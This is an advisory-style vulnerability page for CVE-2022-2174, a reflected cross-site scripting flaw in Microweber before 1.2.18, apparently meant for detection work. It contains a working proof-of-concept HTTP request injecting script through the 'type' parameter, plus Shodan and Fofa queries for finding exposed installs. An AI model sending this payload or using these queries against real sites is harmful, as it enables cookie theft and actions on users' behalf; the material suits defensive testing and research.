🔙 목록으로 돌아가기

CVE-2022-2174: microweber 1.2.18 - Cross-site Scripting

Titlemicroweber 1.2.18 - Cross-site Scripting
Authorr3Y3r53
SeverityMedium
ImpactAttackers can inject malicious JavaScript via reflected XSS in the type parameter, potentially stealing user session cookies or performing unauthorized actions on behalf of users.
RemediationUpgrade to Microweber version 1.2.18 or later.
CVSS Score6.1
EPSS Score0.22204
CVE IDCVE-2022-2174
CWE IDCWE-79
Shodan Queryhttp.favicon.hash:780351152http.html:"microweber"
Fofa Querybody="microweber"icon_hash=780351152
Tags cve cve2022 huntr microweber xss unauth vuln

🔍 Vulnerability Description

Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.18.

🌐 HTTP Request

GET /api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-2174.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-2174.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A